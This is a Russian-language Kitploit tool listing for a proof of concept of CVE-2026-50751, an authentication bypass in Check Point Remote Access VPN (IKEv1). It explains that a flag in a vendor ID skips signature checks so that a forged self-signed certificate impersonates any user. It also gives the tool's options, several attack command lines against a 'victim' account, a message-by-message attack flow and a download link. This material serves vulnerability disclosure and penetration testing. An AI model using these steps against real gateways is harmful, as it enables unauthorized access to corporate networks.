Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-50751 — Обход аутентификации по сертификату в VPN Remote-Access от Check Point (IKEv1). | Kitploit
Инструменты/GitHubGitHub/ull0a/cve-2026-50751
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьКриптографияТестирование на ПроникновениеАутентификацияRed TeamingИнструмент Удаленного Доступа
GitHubull0a/cve-2026-50751

CVE-2026-50751

Обход аутентификации по сертификату в VPN Remote-Access от Check Point (IKEv1).

127 ч 47 мин назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-50751 — PoC

Обход аутентификации по сертификату в VPN Remote-Access от Check Point (IKEv1).

Описание

CVE-2026-50751 — это обход аутентификации в демоне iked Check Point, присутствующий в версиях R81.10, R82 и R82.10 без хотфикса sk185033. Уязвимость позволяет аутентифицироваться как любой подготовленный пользователь Remote Access без закрытого ключа, без пароля и без действительного сертификата.

Уязвимый iked считывает флаг из Vendor ID VPNExtFeatures (бит 0x4) и, если он активирован, пропускает verify_peer_auth / verifyMessagePhase1. Как следствие:

Не проверяется подпись сертификата (доказательство владения).

Не проверяется цепочка доверия.

Проверяется только то, что subject DN соответствует подготовленному пользователю.

Достаточно подделать самоподписанный сертификат, у которого CN= совпадает с целевым пользователем, и отправить его с недействительной подписью. Если шлюз принимает фазу 1, мы аутентифицированы как этот пользователь (SA ISAKMP сохраняется под его DN).

Работает поверх IKE (UDP 500/4500) и поверх Visitor Mode (TCPT, TCP 443).

Использование

Синтаксис

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [опции]

Опции

ФлагОписаниеПо умолчанию
-hostIP или hostname шлюза (обязательно)—
-userUsername RA для подмены (обязательно)—
-portПорт: 500, 4500 (UDP) или 443 (TCPT)500
-orgОрганизация (O=) из ICA. Если опущено, выводится из TLS-сертификата—
-ouОрганизационное подразделение (OU=) пользователяusers
-timeoutТаймаут на операцию6s
-retriesПовторы msg11
-vПодробный выводfalse

Примеры

Базовая атака через UDP/500

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

Принудительное указание организации вместо её вывода

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

Поверх NAT-T (UDP/4500)

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

Ход атаки

root@kitploit:~
Атакующий                                             Шлюз (уязвимый iked)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (бит 0x4) ───▶│
   │                                                          │  Считывает флаг 0x4
   │                                                          │  Устанавливает verify_peer_auth = skip
   │◀── msg2: SA принят ──────────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  Выводит SKEYID, SKEYID_e, IV                            │
   │                                                          │
   │─── msg5 (зашифровано): ID=поддельный DN + самоподписанный CERT
   │                    + случайная подпись ─────────────────▶│
   │                                                          │  Пропускает проверку
   │                                                          │  подписи
   │                                                          │  Сопоставляет DN → пользователь
   │◀── msg6 (зашифровано): SA установлена ──────────────────│
   │                                                          │
   │  Расшифровывает msg6 с SKEYID_e → доказательство аутентификации

Скачать инструмент